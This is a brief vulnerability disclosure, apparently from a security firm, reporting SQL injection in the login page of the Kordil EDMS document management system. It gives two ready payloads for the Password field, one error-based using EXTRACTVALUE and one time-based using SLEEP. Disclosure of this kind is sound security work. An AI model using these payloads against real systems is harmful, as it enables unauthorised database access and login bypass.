Ingress Security has found multiple SQL injection vulnerabilities in the Kordil EDMS software.
Kordil EDMS the Electronic Document Management System with power tools is a user friendly document control and management system to gather all documents and key and important information within your organizations under a single database.
Proof of Concept:
URL: http://localhost/kordil/global_group_login.php
Type: Error-based
Payload: User=admin&Password=12345' AND EXTRACTVALUE(1299,CONCAT(0x5c,0x3a6a6f793a,(SELECT (CASE WHEN (1299=1299) THEN 1 ELSE 0 END)),0x3a6a77683a)) AND 'hax'='hax&act=n&QS_Submit=Submit
URL: http://localhost/kordil/global_group_login.php
Type: Blind - Time-based
Payload: User=admin&Password=12345' AND SLEEP(5) AND 'hax'='hax&act=n&QS_Submit=Submit